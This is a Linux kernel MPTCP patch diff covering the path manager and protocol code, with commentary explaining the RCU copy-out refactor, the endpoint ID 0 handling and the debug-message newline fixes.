+@@ -268,7 +268,7 @@ void mptcp_pm_rm_addr_received(struct mptcp_sock *msk,
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 	u8 i;
+ 
+-	pr_debug("msk=%p remote_ids_nr=%d", msk, rm_list->nr);
++	pr_debug("msk=%p remote_ids_nr=%d\n", msk, rm_list->nr);
+ 
+ 	for (i = 0; i < rm_list->nr; i++)
+ 		mptcp_event_addr_removed(msk, rm_list->ids[i]);
+@@ -307,19 +307,19 @@ void mptcp_pm_mp_fail_received(struct sock *sk, u64 fail_seq)
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(sk);
+ 	struct mptcp_sock *msk = mptcp_sk(subflow->conn);
+ 
+-	pr_debug("fail_seq=%llu", fail_seq);
++	pr_debug("fail_seq=%llu\n", fail_seq);
+ 
+ 	if (!READ_ONCE(msk->allow_infinite_fallback))
+ 		return;
+ 
+ 	if (!subflow->fail_tout) {
+-		pr_debug("send MP_FAIL response and infinite map");
++		pr_debug("send MP_FAIL response and infinite map\n");
+ 
+ 		subflow->send_mp_fail = 1;
+ 		subflow->send_infinite_map = 1;
+ 		tcp_send_ack(sk);
+ 	} else {
+-		pr_debug("MP_FAIL response received");
++		pr_debug("MP_FAIL response received\n");
+ 		WRITE_ONCE(subflow->fail_tout, 0);
+ 	}
+ }
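
Besides the newline fixes, the pm.c context shows how the path manager avoids queuing duplicate work: each pending event is one bit in pm.status, and mptcp_pm_schedule_work() bails out if that bit is already set. The idea in plain C, with names that are illustrative rather than the kernel's:

#include <stdbool.h>
#include <stdio.h>

#define BIT(n) (1UL << (n))

struct pm_state {
	unsigned long status;		/* one bit per pending event */
};

/* true only for the first request of a given event */
static bool pm_schedule(struct pm_state *pm, unsigned int event)
{
	if (pm->status & BIT(event))
		return false;		/* already pending, skip */
	pm->status |= BIT(event);
	return true;
}

int main(void)
{
	struct pm_state pm = { 0 };

	printf("%d\n", pm_schedule(&pm, 3));	/* 1: queued */
	printf("%d\n", pm_schedule(&pm, 3));	/* 0: duplicate */
	return 0;
}
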
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 9e16ae1b23fc7..f001e15474029 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -150,12 +150,14 @@ static bool lookup_subflow_by_daddr(const struct list_head *list,
+ 	return false;
+ }
+ 
+-static struct mptcp_pm_addr_entry *
++static bool
+ select_local_address(const struct pm_nl_pernet *pernet,
+-		     const struct mptcp_sock *msk)
++		     const struct mptcp_sock *msk,
++		     struct mptcp_pm_addr_entry *new_entry)
+ {
+ 	const struct sock *sk = (const struct sock *)msk;
+-	struct mptcp_pm_addr_entry *entry, *ret = NULL;
++	struct mptcp_pm_addr_entry *entry;
++	bool found = false;
+ 
+ 	msk_owned_by_me(msk);
+ 
+@@ -177,17 +179,21 @@ select_local_address(const struct pm_nl_pernet *pernet,
+ 				continue;
+ 		}
+ 
+-		ret = entry;
++		*new_entry = *entry;
++		found = true;
+ 		break;
+ 	}
+ 	rcu_read_unlock();
+-	return ret;
++
++	return found;
+ }
+ 
+-static struct mptcp_pm_addr_entry *
+-select_signal_address(struct pm_nl_pernet *pernet, const struct mptcp_sock *msk)
++static bool
++select_signal_address(struct pm_nl_pernet *pernet, const struct mptcp_sock *msk,
++		      struct mptcp_pm_addr_entry *new_entry)
+ {
+-	struct mptcp_pm_addr_entry *entry, *ret = NULL;
++	struct mptcp_pm_addr_entry *entry;
++	bool found = false;
+ 
+ 	rcu_read_lock();
+ 	/* do not keep any additional per socket state, just signal
+@@ -202,11 +208,13 @@ select_signal_address(struct pm_nl_pernet *pernet, const struct mptcp_sock *msk)
+ 		if (!(entry->flags & MPTCP_PM_ADDR_FLAG_SIGNAL))
+ 			continue;
+ 
+-		ret = entry;
++		*new_entry = *entry;
++		found = true;
+ 		break;
+ 	}
+ 	rcu_read_unlock();
+-	return ret;
++
++	return found;
+ }
+ 
+ unsigned int mptcp_pm_get_add_addr_signal_max(const struct mptcp_sock *msk)
+@@ -297,7 +305,7 @@ static void mptcp_pm_add_timer(struct timer_list *timer)
+ 	struct mptcp_sock *msk = entry->sock;
+ 	struct sock *sk = (struct sock *)msk;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	if (!msk)
+ 		return;
+@@ -316,7 +324,7 @@ static void mptcp_pm_add_timer(struct timer_list *timer)
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+ 	if (!mptcp_pm_should_add_signal_addr(msk)) {
+-		pr_debug("retransmit ADD_ADDR id=%d", entry->addr.id);
++		pr_debug("retransmit ADD_ADDR id=%d\n", entry->addr.id);
+ 		mptcp_pm_announce_addr(msk, &entry->addr, false);
+ 		mptcp_pm_add_addr_send_ack(msk);
+ 		entry->retrans_times++;
+@@ -397,7 +405,7 @@ void mptcp_pm_free_anno_list(struct mptcp_sock *msk)
+ 	struct sock *sk = (struct sock *)msk;
+ 	LIST_HEAD(free_list);
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	list_splice_init(&msk->pm.anno_list, &free_list);
+@@ -474,7 +482,7 @@ static void __mptcp_pm_send_ack(struct mptcp_sock *msk, struct mptcp_subflow_con
+ 	struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 	bool slow;
+ 
+-	pr_debug("send ack for %s",
++	pr_debug("send ack for %s\n",
+ 		 prio ? "mp_prio" : (mptcp_pm_should_add_signal(msk) ? "add_addr" : "rm_addr"));
+ 
+ 	slow = lock_sock_fast(ssk);
+@@ -527,9 +535,10 @@ __lookup_addr(struct pm_nl_pernet *pernet, const struct mptcp_addr_info *info,
+ 
+ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ {
+-	struct mptcp_pm_addr_entry *local, *signal_and_subflow = NULL;
+ 	struct sock *sk = (struct sock *)msk;
++	struct mptcp_pm_addr_entry local;
+ 	unsigned int add_addr_signal_max;
++	bool signal_and_subflow = false;
+ 	unsigned int local_addr_max;
+ 	struct pm_nl_pernet *pernet;
+ 	unsigned int subflows_max;
+@@ -580,23 +589,27 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		if (msk->pm.addr_signal & BIT(MPTCP_ADD_ADDR_SIGNAL))
+ 			return;
+ 
+-		local = select_signal_address(pernet, msk);
+-		if (!local)
++		if (!select_signal_address(pernet, msk, &local))
+ 			goto subflow;
+ 
+ 		/* If the alloc fails, we are on memory pressure, not worth
+ 		 * continuing, and trying to create subflows.
+ 		 */
+-		if (!mptcp_pm_alloc_anno_list(msk, &local->addr))
++		if (!mptcp_pm_alloc_anno_list(msk, &local.addr))
+ 			return;
+ 
+-		__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
++		__clear_bit(local.addr.id, msk->pm.id_avail_bitmap);
+ 		msk->pm.add_addr_signaled++;
+-		mptcp_pm_announce_addr(msk, &local->addr, false);
++
++		/* Special case for ID0: set the correct ID */
++		if (local.addr.id == msk->mpc_endpoint_id)
++			local.addr.id = 0;
++
++		mptcp_pm_announce_addr(msk, &local.addr, false);
+ 		mptcp_pm_nl_addr_send_ack(msk);
+ 
+-		if (local->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW)
+-			signal_and_subflow = local;
++		if (local.flags & MPTCP_PM_ADDR_FLAG_SUBFLOW)
++			signal_and_subflow = true;
+ 	}
+ 
+ subflow:
+@@ -607,24 +620,28 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		bool fullmesh;
+ 		int i, nr;
+ 
+-		if (signal_and_subflow) {
+-			local = signal_and_subflow;
+-			signal_and_subflow = NULL;
+-		} else {
+-			local = select_local_address(pernet, msk);
+-			if (!local)
+-				break;
+-		}
++		if (signal_and_subflow)
++			signal_and_subflow = false;
++		else if (!select_local_address(pernet, msk, &local))
++			break;
++
++		fullmesh = !!(local.flags & MPTCP_PM_ADDR_FLAG_FULLMESH);
++
++		__clear_bit(local.addr.id, msk->pm.id_avail_bitmap);
+ 
+-		fullmesh = !!(local->flags & MPTCP_PM_ADDR_FLAG_FULLMESH);
++		/* Special case for ID0: set the correct ID */
++		if (local.addr.id == msk->mpc_endpoint_id)
++			local.addr.id = 0;
++		else /* local_addr_used is not decr for ID 0 */
++			msk->pm.local_addr_used++;
++
++		nr = fill_remote_addresses_vec(msk, &local.addr, fullmesh, addrs);
++		if (nr == 0)
++			continue;
+ 
+-		msk->pm.local_addr_used++;
+-		nr = fill_remote_addresses_vec(msk, &local->addr, fullmesh, addrs);
+-		if (nr)
+-			__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 		for (i = 0; i < nr; i++)
+-			__mptcp_subflow_connect(sk, &local->addr, &addrs[i]);
++			__mptcp_subflow_connect(sk, &local.addr, &addrs[i]);
+ 		spin_lock_bh(&msk->pm.lock);
+ 	}
+ 	mptcp_pm_nl_check_work_pending(msk);
+@@ -648,7 +665,7 @@ static unsigned int fill_local_addresses_vec(struct mptcp_sock *msk,
+ {
+ 	struct sock *sk = (struct sock *)msk;
+ 	struct mptcp_pm_addr_entry *entry;
+-	struct mptcp_addr_info local;
++	struct mptcp_addr_info mpc_addr;
+ 	struct pm_nl_pernet *pernet;
+ 	unsigned int subflows_max;
+ 	int i = 0;
+@@ -656,6 +673,8 @@ static unsigned int fill_local_addresses_vec(struct mptcp_sock *msk,
+ 	pernet = pm_nl_get_pernet_from_msk(msk);
+ 	subflows_max = mptcp_pm_get_subflows_max(msk);
+ 
++	mptcp_local_address((struct sock_common *)msk, &mpc_addr);
++
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(entry, &pernet->local_addr_list, list) {
+ 		if (!(entry->flags & MPTCP_PM_ADDR_FLAG_FULLMESH))
+@@ -673,7 +692,13 @@ static unsigned int fill_local_addresses_vec(struct mptcp_sock *msk,
+ 
+ 		if (msk->pm.subflows < subflows_max) {
+ 			msk->pm.subflows++;
+-			addrs[i++] = entry->addr;
++			addrs[i] = entry->addr;
++
++			/* Special case for ID0: set the correct ID */
++			if (mptcp_addresses_equal(&entry->addr, &mpc_addr, entry->addr.port))
++				addrs[i].id = 0;
++
++			i++;
+ 		}
+ 	}
+ 	rcu_read_unlock();
+@@ -682,6 +707,8 @@ static unsigned int fill_local_addresses_vec(struct mptcp_sock *msk,
+ 	 * 'IPADDRANY' local address
+ 	 */
+ 	if (!i) {
++		struct mptcp_addr_info local;
++
+ 		memset(&local, 0, sizeof(local));
+ 		local.family = msk->pm.remote.family;
+ 
+@@ -705,7 +732,7 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	add_addr_accept_max = mptcp_pm_get_add_addr_accept_max(msk);
+ 	subflows_max = mptcp_pm_get_subflows_max(msk);
+ 
+-	pr_debug("accepted %d:%d remote family %d",
++	pr_debug("accepted %d:%d remote family %d\n",
+ 		 msk->pm.add_addr_accepted, add_addr_accept_max,
+ 		 msk->pm.remote.family);
+ 
+@@ -732,7 +759,9 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+ 	if (sf_created) {
+-		msk->pm.add_addr_accepted++;
++		/* add_addr_accepted is not decr for ID 0 */
++		if (remote.id)
++			msk->pm.add_addr_accepted++;
+ 		if (msk->pm.add_addr_accepted >= add_addr_accept_max ||
+ 		    msk->pm.subflows >= subflows_max)
+ 			WRITE_ONCE(msk->pm.accept_addr, false);
+@@ -774,7 +803,7 @@ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 
+-	pr_debug("bkup=%d", bkup);
++	pr_debug("bkup=%d\n", bkup);
+ 
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+@@ -797,11 +826,6 @@ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+ 	return -EINVAL;
+ }
+ 
+-static bool mptcp_local_id_match(const struct mptcp_sock *msk, u8 local_id, u8 id)
+-{
+-	return local_id == id || (!local_id && msk->mpc_endpoint_id == id);
+-}
+-
+ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 					   const struct mptcp_rm_list *rm_list,
+ 					   enum linux_mptcp_mib_field rm_type)
+@@ -810,7 +834,7 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 	struct sock *sk = (struct sock *)msk;
+ 	u8 i;
+ 
+-	pr_debug("%s rm_list_nr %d",
++	pr_debug("%s rm_list_nr %d\n",
+ 		 rm_type == MPTCP_MIB_RMADDR ? "address" : "subflow", rm_list->nr);
+ 
+ 	msk_owned_by_me(msk);
+@@ -838,10 +862,10 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 				continue;
+ 			if (rm_type == MPTCP_MIB_RMADDR && remote_id != rm_id)
+ 				continue;
+-			if (rm_type == MPTCP_MIB_RMSUBFLOW && !mptcp_local_id_match(msk, id, rm_id))
++			if (rm_type == MPTCP_MIB_RMSUBFLOW && id != rm_id)
+ 				continue;
+ 
+-			pr_debug(" -> %s rm_list_ids[%d]=%u local_id=%u remote_id=%u mpc_id=%u",
++			pr_debug(" -> %s rm_list_ids[%d]=%u local_id=%u remote_id=%u mpc_id=%u\n",
+ 				 rm_type == MPTCP_MIB_RMADDR ? "address" : "subflow",
+ 				 i, rm_id, id, remote_id, msk->mpc_endpoint_id);
+ 			spin_unlock_bh(&msk->pm.lock);
+@@ -898,7 +922,7 @@ void mptcp_pm_nl_work(struct mptcp_sock *msk)
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+-	pr_debug("msk=%p status=%x", msk, pm->status);
++	pr_debug("msk=%p status=%x\n", msk, pm->status);
+ 	if (pm->status & BIT(MPTCP_PM_ADD_ADDR_RECEIVED)) {
+ 		pm->status &= ~BIT(MPTCP_PM_ADD_ADDR_RECEIVED);
+ 		mptcp_pm_nl_add_addr_received(msk);
+@@ -1472,6 +1496,12 @@ static bool remove_anno_list_by_saddr(struct mptcp_sock *msk,
+ 	return false;
+ }
+ 
++static u8 mptcp_endp_get_local_id(struct mptcp_sock *msk,
++				  const struct mptcp_addr_info *addr)
++{
++	return msk->mpc_endpoint_id == addr->id ? 0 : addr->id;
++}
++
+ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 				      const struct mptcp_addr_info *addr,
+ 				      bool force)
+@@ -1479,7 +1509,7 @@ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 	struct mptcp_rm_list list = { .nr = 0 };
+ 	bool ret;
+ 
+-	list.ids[list.nr++] = addr->id;
++	list.ids[list.nr++] = mptcp_endp_get_local_id(msk, addr);
+ 
+ 	ret = remove_anno_list_by_saddr(msk, addr);
+ 	if (ret || force) {
+@@ -1506,13 +1536,11 @@ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 						   const struct mptcp_pm_addr_entry *entry)
+ {
+ 	const struct mptcp_addr_info *addr = &entry->addr;
+-	struct mptcp_rm_list list = { .nr = 0 };
++	struct mptcp_rm_list list = { .nr = 1 };
+ 	long s_slot = 0, s_num = 0;
+ 	struct mptcp_sock *msk;
+ 
+-	pr_debug("remove_id=%d", addr->id);
+-
+-	list.ids[list.nr++] = addr->id;
++	pr_debug("remove_id=%d\n", addr->id);
+ 
+ 	while ((msk = mptcp_token_iter_next(net, &s_slot, &s_num)) != NULL) {
+ 		struct sock *sk = (struct sock *)msk;
+@@ -1531,6 +1559,7 @@ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 		mptcp_pm_remove_anno_addr(msk, addr, remove_subflow &&
+ 					  !(entry->flags & MPTCP_PM_ADDR_FLAG_IMPLICIT));
+ 
++		list.ids[0] = mptcp_endp_get_local_id(msk, addr);
+ 		if (remove_subflow) {
+ 			spin_lock_bh(&msk->pm.lock);
+ 			mptcp_pm_nl_rm_subflow_received(msk, &list);
+@@ -1639,6 +1668,7 @@ static int mptcp_nl_cmd_del_addr(struct sk_buff *skb, struct genl_info *info)
+ 	return ret;
+ }
+ 
++/* Called from the userspace PM only */
+ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
+ {
+ 	struct mptcp_rm_list alist = { .nr = 0 };
+@@ -1667,8 +1697,9 @@ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
+ 	}
+ }
+ 
+-void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+-					struct list_head *rm_list)
++/* Called from the in-kernel PM only */
++static void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
++					       struct list_head *rm_list)
+ {
+ 	struct mptcp_rm_list alist = { .nr = 0 }, slist = { .nr = 0 };
+ 	struct mptcp_pm_addr_entry *entry;
+@@ -1676,11 +1707,11 @@ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 	list_for_each_entry(entry, rm_list, list) {
+ 		if (slist.nr < MPTCP_RM_IDS_MAX &&
+ 		    lookup_subflow_by_saddr(&msk->conn_list, &entry->addr))
+-			slist.ids[slist.nr++] = entry->addr.id;
++			slist.ids[slist.nr++] = mptcp_endp_get_local_id(msk, &entry->addr);
+ 
+ 		if (alist.nr < MPTCP_RM_IDS_MAX &&
+ 		    remove_anno_list_by_saddr(msk, &entry->addr))
+-			alist.ids[alist.nr++] = entry->addr.id;
++			alist.ids[alist.nr++] = mptcp_endp_get_local_id(msk, &entry->addr);
+ 	}
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+@@ -1968,7 +1999,7 @@ static void mptcp_pm_nl_fullmesh(struct mptcp_sock *msk,
+ {
+ 	struct mptcp_rm_list list = { .nr = 0 };
+ 
+-	list.ids[list.nr++] = addr->id;
++	list.ids[list.nr++] = mptcp_endp_get_local_id(msk, addr);
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	mptcp_pm_nl_rm_subflow_received(msk, &list);
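
The substantive pm_netlink.c change is the select_local_address()/select_signal_address() refactor: the helpers used to return a pointer into the RCU-protected local_addr_list, which is only valid inside the read-side critical section, and now copy the matching entry into a caller-provided buffer and return a bool. A reduced sketch of that copy-out-under-RCU pattern, with a hypothetical entry type standing in for mptcp_pm_addr_entry:

/* sketch: snapshot an RCU list entry instead of leaking a pointer */
#include <linux/rculist.h>
#include <linux/rcupdate.h>

struct addr_entry {
	struct list_head list;
	unsigned int flags;
	int id;
};

static bool select_entry(struct list_head *head, unsigned int want,
			 struct addr_entry *out)
{
	struct addr_entry *e;
	bool found = false;

	rcu_read_lock();
	list_for_each_entry_rcu(e, head, list) {
		if (!(e->flags & want))
			continue;
		*out = *e;	/* copy while the entry is guaranteed live */
		found = true;
		break;
	}
	rcu_read_unlock();

	return found;		/* *out stays usable after the unlock */
}

The ID 0 special-casing in the hunks above (rewriting local.addr.id to 0 when it matches mpc_endpoint_id) relies on exactly this: the caller now owns a private copy it is free to modify.
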
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 258dbfe9fad30..62a2da0f2b54d 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -152,7 +152,7 @@ static bool mptcp_try_coalesce(struct sock *sk, struct sk_buff *to,
+ 	    !skb_try_coalesce(to, from, &fragstolen, &delta))
+ 		return false;
+ 
+-	pr_debug("colesced seq %llx into %llx new len %d new end seq %llx",
++	pr_debug("colesced seq %llx into %llx new len %d new end seq %llx\n",
+ 		 MPTCP_SKB_CB(from)->map_seq, MPTCP_SKB_CB(to)->map_seq,
+ 		 to->len, MPTCP_SKB_CB(from)->end_seq);
+ 	MPTCP_SKB_CB(to)->end_seq = MPTCP_SKB_CB(from)->end_seq;
+@@ -230,7 +230,7 @@ static void mptcp_data_queue_ofo(struct mptcp_sock *msk, struct sk_buff *skb)
+ 	end_seq = MPTCP_SKB_CB(skb)->end_seq;
+ 	max_seq = atomic64_read(&msk->rcv_wnd_sent);
+ 
+-	pr_debug("msk=%p seq=%llx limit=%llx empty=%d", msk, seq, max_seq,
++	pr_debug("msk=%p seq=%llx limit=%llx empty=%d\n", msk, seq, max_seq,
+ 		 RB_EMPTY_ROOT(&msk->out_of_order_queue));
+ 	if (after64(end_seq, max_seq)) {
+ 		/* out of window */
+@@ -653,7 +653,7 @@ static bool __mptcp_move_skbs_from_subflow(struct mptcp_sock *msk,
+ 		}
+ 	}
+ 
+-	pr_debug("msk=%p ssk=%p", msk, ssk);
++	pr_debug("msk=%p ssk=%p\n", msk, ssk);
+ 	tp = tcp_sk(ssk);
+ 	do {
+ 		u32 map_remaining, offset;
+@@ -732,7 +732,7 @@ static bool __mptcp_ofo_queue(struct mptcp_sock *msk)
+ 	u64 end_seq;
+ 
+ 	p = rb_first(&msk->out_of_order_queue);
+-	pr_debug("msk=%p empty=%d", msk, RB_EMPTY_ROOT(&msk->out_of_order_queue));
++	pr_debug("msk=%p empty=%d\n", msk, RB_EMPTY_ROOT(&msk->out_of_order_queue));
+ 	while (p) {
+ 		skb = rb_to_skb(p);
+ 		if (after64(MPTCP_SKB_CB(skb)->map_seq, msk->ack_seq))
+@@ -754,7 +754,7 @@ static bool __mptcp_ofo_queue(struct mptcp_sock *msk)
+ 			int delta = msk->ack_seq - MPTCP_SKB_CB(skb)->map_seq;
+ 
+ 			/* skip overlapping data, if any */
+-			pr_debug("uncoalesced seq=%llx ack seq=%llx delta=%d",
++			pr_debug("uncoalesced seq=%llx ack seq=%llx delta=%d\n",
+ 				 MPTCP_SKB_CB(skb)->map_seq, msk->ack_seq,
+ 				 delta);
+ 			MPTCP_SKB_CB(skb)->offset += delta;
+@@ -1292,7 +1292,7 @@ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 	size_t copy;
+ 	int i;
+ 
+-	pr_debug("msk=%p ssk=%p sending dfrag at seq=%llu len=%u already sent=%u",
++	pr_debug("msk=%p ssk=%p sending dfrag at seq=%llu len=%u already sent=%u\n",
+ 		 msk, ssk, dfrag->data_seq, dfrag->data_len, info->sent);
+ 
+ 	if (WARN_ON_ONCE(info->sent > info->limit ||
+@@ -1393,7 +1393,7 @@ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 	mpext->use_map = 1;
+ 	mpext->dsn64 = 1;
+ 
+-	pr_debug("data_seq=%llu subflow_seq=%u data_len=%u dsn64=%d",
++	pr_debug("data_seq=%llu subflow_seq=%u data_len=%u dsn64=%d\n",
+ 		 mpext->data_seq, mpext->subflow_seq, mpext->data_len,
+ 		 mpext->dsn64);
+ 
+@@ -1870,7 +1870,7 @@ static int mptcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 			if (!msk->first_pending)
+ 				WRITE_ONCE(msk->first_pending, dfrag);
+ 		}
+-		pr_debug("msk=%p dfrag at seq=%llu len=%u sent=%u new=%d", msk,
++		pr_debug("msk=%p dfrag at seq=%llu len=%u sent=%u new=%d\n", msk,
+ 			 dfrag->data_seq, dfrag->data_len, dfrag->already_sent,
+ 			 !dfrag_collapsed);
+ 
+@@ -2226,7 +2226,7 @@ static int mptcp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 			}
+ 		}
+ 
+-		pr_debug("block timeout %ld", timeo);
++		pr_debug("block timeout %ld\n", timeo);
+ 		sk_wait_data(sk, &timeo, NULL);
+ 	}
+ 
+@@ -2242,7 +2242,7 @@ static int mptcp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 		}
+ 	}
+ 
+-	pr_debug("msk=%p rx queue empty=%d:%d copied=%d",
++	pr_debug("msk=%p rx queue empty=%d:%d copied=%d\n",
+ 		 msk, skb_queue_empty_lockless(&sk->sk_receive_queue),
+ 		 skb_queue_empty(&msk->receive_queue), copied);
+ 	if (!(flags & MSG_PEEK))
+@@ -2503,6 +2503,12 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow)
+ {
++	/* The first subflow can already be closed and still in the list */
++	if (subflow->close_event_done)
++		return;
++
++	subflow->close_event_done = true;
++
+ 	if (sk->sk_state == TCP_ESTABLISHED)
+ 		mptcp_event(MPTCP_EVENT_SUB_CLOSED, mptcp_sk(sk), ssk, GFP_KERNEL);
+ 
+@@ -2697,7 +2703,7 @@ static void mptcp_mp_fail_no_response(struct mptcp_sock *msk)
+ 	if (!ssk)
+ 		return;
+ 
+-	pr_debug("MP_FAIL doesn't respond, reset the subflow");
++	pr_debug("MP_FAIL doesn't respond, reset the subflow\n");
+ 
+ 	slow = lock_sock_fast(ssk);
+ 	mptcp_subflow_reset(ssk);
+@@ -2869,7 +2875,7 @@ void mptcp_subflow_shutdown(struct sock *sk, struct sock *ssk, int how)
+ 		break;
+ 	default:
+ 		if (__mptcp_check_fallback(mptcp_sk(sk))) {
+-			pr_debug("Fallback");
++			pr_debug("Fallback\n");
+ 			ssk->sk_shutdown |= how;
+ 			tcp_shutdown(ssk, how);
+ 
+@@ -2879,7 +2885,7 @@ void mptcp_subflow_shutdown(struct sock *sk, struct sock *ssk, int how)
+ 			WRITE_ONCE(mptcp_sk(sk)->snd_una, mptcp_sk(sk)->snd_nxt);
+ 			mptcp_schedule_work(sk);
+ 		} else {
+-			pr_debug("Sending DATA_FIN on subflow %p", ssk);
++			pr_debug("Sending DATA_FIN on subflow %p\n", ssk);
+ 			tcp_send_ack(ssk);
+ 			if (!mptcp_rtx_timer_pending(sk))
+ 				mptcp_reset_rtx_timer(sk);
+@@ -2922,7 +2928,7 @@ static void mptcp_check_send_data_fin(struct sock *sk)
+ 	struct mptcp_subflow_context *subflow;
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	pr_debug("msk=%p snd_data_fin_enable=%d pending=%d snd_nxt=%llu write_seq=%llu",
++	pr_debug("msk=%p snd_data_fin_enable=%d pending=%d snd_nxt=%llu write_seq=%llu\n",
+ 		 msk, msk->snd_data_fin_enable, !!mptcp_send_head(sk),
+ 		 msk->snd_nxt, msk->write_seq);
+ 
+@@ -2946,7 +2952,7 @@ static void __mptcp_wr_shutdown(struct sock *sk)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	pr_debug("msk=%p snd_data_fin_enable=%d shutdown=%x state=%d pending=%d",
++	pr_debug("msk=%p snd_data_fin_enable=%d shutdown=%x state=%d pending=%d\n",
+ 		 msk, msk->snd_data_fin_enable, sk->sk_shutdown, sk->sk_state,
+ 		 !!mptcp_send_head(sk));
+ 
+@@ -2961,7 +2967,7 @@ static void __mptcp_destroy_sock(struct sock *sk)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	might_sleep();
+ 
+@@ -3073,7 +3079,7 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 		inet_sk_state_store(sk, TCP_CLOSE);
+ 
+ 	sock_hold(sk);
+-	pr_debug("msk=%p state=%d", sk, sk->sk_state);
++	pr_debug("msk=%p state=%d\n", sk, sk->sk_state);
+ 	if (mptcp_sk(sk)->token)
+ 		mptcp_event(MPTCP_EVENT_CLOSED, msk, NULL, GFP_KERNEL);
+ 
+@@ -3331,12 +3337,12 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 		return NULL;
+ 	}
+ 
+-	pr_debug("msk=%p, listener=%p", msk, mptcp_subflow_ctx(listener->sk));
++	pr_debug("msk=%p, listener=%p\n", msk, mptcp_subflow_ctx(listener->sk));
+ 	newsk = inet_csk_accept(listener->sk, flags, err, kern);
+ 	if (!newsk)
+ 		return NULL;
+ 
+-	pr_debug("msk=%p, subflow is mptcp=%d", msk, sk_is_mptcp(newsk));
++	pr_debug("msk=%p, subflow is mptcp=%d\n", msk, sk_is_mptcp(newsk));
+ 	if (sk_is_mptcp(newsk)) {
+ 		struct mptcp_subflow_context *subflow;
+ 		struct sock *new_mptcp_sock;
+@@ -3550,7 +3556,7 @@ static int mptcp_get_port(struct sock *sk, unsigned short snum)
+ 	struct socket *ssock;
+ 
+ 	ssock = msk->subflow;
+-	pr_debug("msk=%p, subflow=%p", msk, ssock);
++	pr_debug("msk=%p, subflow=%p\n", msk, ssock);
+ 	if (WARN_ON_ONCE(!ssock))
+ 		return -EINVAL;
+ 
+@@ -3568,7 +3574,7 @@ void mptcp_finish_connect(struct sock *ssk)
+ 	sk = subflow->conn;
+ 	msk = mptcp_sk(sk);
+ 
+-	pr_debug("msk=%p, token=%u", sk, subflow->token);
++	pr_debug("msk=%p, token=%u\n", sk, subflow->token);
+ 
+ 	mptcp_crypto_key_sha(subflow->remote_key, NULL, &ack_seq);
+ 	ack_seq++;
+@@ -3608,7 +3614,7 @@ bool mptcp_finish_join(struct sock *ssk)
+ 	struct sock *parent = (void *)msk;
+ 	bool ret = true;
+ 
+-	pr_debug("msk=%p, subflow=%p", msk, subflow);
++	pr_debug("msk=%p, subflow=%p\n", msk, subflow);
+ 
+ 	/* mptcp socket already closing? */
+ 	if (!mptcp_is_fully_established(parent)) {
+@@ -3653,7 +3659,7 @@ bool mptcp_finish_join(struct sock *ssk)
+ 
+ static void mptcp_shutdown(struct sock *sk, int how)
+ {
+-	pr_debug("sk=%p, how=%d", sk, how);
++	pr_debug("sk=%p, how=%d\n", sk, how);
+ 
+ 	if ((how & SEND_SHUTDOWN) && mptcp_close_state(sk))
+ 		__mptcp_wr_shutdown(sk);
